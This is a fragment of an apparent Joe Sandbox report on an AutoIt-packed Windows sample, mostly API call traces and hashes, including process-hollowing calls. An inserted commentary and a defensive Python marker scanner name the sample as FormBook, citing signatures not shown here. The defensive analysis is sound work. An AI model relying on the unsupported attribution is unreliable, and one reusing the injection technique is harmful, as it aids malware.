                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

Control-flow Graph (graph image not reproduced)

APIs
• GetSysColorBrush.USER32(0000000F), ref: 0041039B
• LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
• LoadIconW.USER32(?,00000063), ref: 004103C0
• LoadIconW.USER32(?,000000A4), ref: 004103D3
• LoadIconW.USER32(?,000000A2), ref: 004103E6
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
• RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A2F2E8,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
• Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
• Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
• Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _malloc
• String ID: Default
• API String ID: 1579825452-753088835
• Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
• Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
• Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
• Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Function entry 0040f5c0; basic blocks span 0040f5c0-0040f6df and 00425d05-00425d5f; internal calls to 00422240, 00413650, 00410e60, 00414d04, 004150d1 and 00414d30.
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __fread_nolock_fseek_memmove_strcat
• String ID: AU3!$EA06
• API String ID: 1268643489-2658333250
• Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
• Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
• Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
• Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
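The two records above give the static markers a triage analyst can reuse: the file reader at 0040f5c0 (fread/fseek/memmove/strcat) compares the strings "AU3!" and "EA06", which together form the header token of an embedded compiled AutoIt script, and the GUI setup around 00410490 registers the window class "AutoIt v3 GUI". The following scanner is an added example, not code from this report, Joe Sandbox or the sample; it searches a blob for both markers and runs on a constructed stand-in input. The 16-byte magic it expects directly before "AU3!EA06" is an assumption taken from public AutoIt extractor tooling, not from this report.

```python
import sys
from typing import Dict, List

# Values taken from this report: the script-header token the loader at
# 0040f5c0 compares ("AU3!" followed by "EA06") and the window class the
# runtime registers at 00410490.
AU3_TOKEN = b"AU3!EA06"
GUI_CLASS = "AutoIt v3 GUI"

# Assumption, not from the report: the 16-byte magic that public AutoIt
# extractor tooling expects immediately before "AU3!EA06" in a compiled script.
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


def find_all(data: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in data (overlaps included)."""
    hits: List[int] = []
    start = 0
    while True:
        idx = data.find(needle, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def scan_autoit_markers(data: bytes) -> Dict[str, object]:
    """Locate the AutoIt markers and classify the blob.

    A hit on the 8-byte token is stronger than a hit on the class name: the
    class name also lives in the plain AutoIt runtime, while the token only
    appears where a compiled script has been embedded.
    """
    token_hits = find_all(data, AU3_TOKEN)
    # A full script header is the magic immediately followed by the token.
    header_hits = [
        off for off in find_all(data, AU3_MAGIC)
        if data[off + len(AU3_MAGIC): off + len(AU3_MAGIC) + len(AU3_TOKEN)] == AU3_TOKEN
    ]
    # The runtime hands the class name to RegisterClassExW, so it is stored as
    # UTF-16LE; the ASCII form is checked too for strings dumps and logs.
    gui_hits = sorted(
        find_all(data, GUI_CLASS.encode("utf-16-le"))
        + find_all(data, GUI_CLASS.encode("ascii"))
    )
    return {
        "au3_token_offsets": token_hits,
        "script_header_offsets": header_hits,
        "gui_class_offsets": gui_hits,
        "embedded_script": bool(header_hits),
        "likely_autoit": bool(token_hits or gui_hits),
    }


def build_sample() -> bytes:
    """Constructed test input (not the analysed sample): a PE-like stub holding
    the UTF-16 class name, followed by a compiled-script header and a fake body."""
    blob = bytearray(b"MZ" + b"\x00" * 62)               # 64-byte fake DOS header
    blob += b"filler " * 16                               # 112 bytes of padding
    blob += GUI_CLASS.encode("utf-16-le") + b"\x00\x00"   # class name lands at offset 176
    blob += b"\x00" * 40
    blob += AU3_MAGIC + AU3_TOKEN + b"\x00" * 8           # magic at 244, token at 260
    return bytes(blob)


if __name__ == "__main__":
    target = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for key, value in scan_autoit_markers(target).items():
        print(f"{key}: {value}")
```

Two caveats when using this on real files. The runtime stores its comparison constants as the separate strings "AU3!" and "EA06" (as the report lists them), so the 8-byte token search hits only the embedded script, not the loader's own code; and the class name is also present in every benign AutoIt-compiled program, so either hit only says "AutoIt stub", never "FormBook". The payload attribution still has to come from the behavioural signatures in the report (process injection, browser and mail credential access, the Suricata alerts).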

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
• Function entry 00401100 (window procedure); basic blocks span 00401100-00401225 and 0042afb4-0042b06d; internal calls to 00401250, 0040f190, 00401000, 0040e0c0, 00468b0e, 004370f4, 00401a50 and 0045fd57; imported calls DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu.
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
• KillTimer.USER32(?,00000001,?), ref: 004011B9
• PostQuitMessage.USER32(00000000), ref: 004011CB
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
• CreatePopupMenu.USER32 ref: 00401204
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

Control-flow Graph (rendered graph not reproduced; basic blocks 4115d7-411656, internal calls only)
APIs
• _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• std::exception::exception.LIBCMT ref: 00411626
• std::exception::exception.LIBCMT ref: 00411640
• __CxxThrowException@8.LIBCMT ref: 00411651
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: ,*H$4*H$@fI
• API String ID: 615853336-1459471987
• Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
• Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
• Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
• Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

Control-flow Graph (rendered graph not reproduced; basic blocks 40de600-40de902 with calls to CreateFileW, VirtualAlloc, ReadFile, VirtualFree and CloseHandle)
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040DE6D1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040DE8F7
Memory Dump Source
• Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
• Instruction ID: d914517ba37b06ff15eab41dee2cfef785d20ad5d30c0d9c91961c9788d7d99d
• Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
• Instruction Fuzzy Hash: FDA10674E00709EBDB54CFA4C894BEEBBB5FF48304F208169E605BB280D775AA44CB95

Control-flow Graph (rendered graph not reproduced; basic blocks 40e4c0-40e4f0 and 427190-42722a with calls to RegOpenKeyExW, RegQueryValueExW and RegCloseKey)
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

Control-flow Graph (rendered graph not reproduced; single basic block 410570-4105f1 calling CreateWindowExW twice and ShowWindow twice)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
control_flow_graph 2137 40de3f0-40de4fb call 40dc040 call 40de2e0 CreateFileW VirtualAlloc ReadFile call 40de320 call 40dd2e0 call 40de370 ExitProcess (graph node/edge listing omitted)
APIs
  • Part of subcall function 040DE2E0: Sleep.KERNELBASE(000001F4), ref: 040DE2F1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040DE4F1
Memory Dump Source
• Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: YOVLVLFDH4ZZNGSK4
• API String ID: 2694422964-1138834768
• Opcode ID: e65a993e409eec5c6226dc0bf6d294f85f70c612e6761850d1eb94914adeafef
• Instruction ID: 0dc14452af8bc2ce9d08a23b411752484cada8372222fe29fe15bdafa2cf25fe
• Opcode Fuzzy Hash: e65a993e409eec5c6226dc0bf6d294f85f70c612e6761850d1eb94914adeafef
• Instruction Fuzzy Hash: 3F517171E04349DAEF11DBA4C818BEFBBB5AF05304F004199E6097B2C0E7791B48CBA5
APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcsncpy.LIBCMT ref: 00401C41
• _wcscpy.LIBCMT ref: 00401C5D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1874344091-1585850449
• Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
• Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
APIs
• SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
• SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
• _wcsncpy.LIBCMT ref: 004102ED
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
• _wcsncpy.LIBCMT ref: 00410340
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcsncpy$DesktopFolderFromListMallocPath
• String ID: (none)
• API String ID: 3170942423-0
• Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
• Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 040DDA9B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040DDB31
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040DDB53
Memory Dump Source
• Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove
• String ID: Error:
• API String ID: 4104443479-232661952
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0042961B
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
• String ID: X$pWH
• API String ID: 85490731-941433119
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
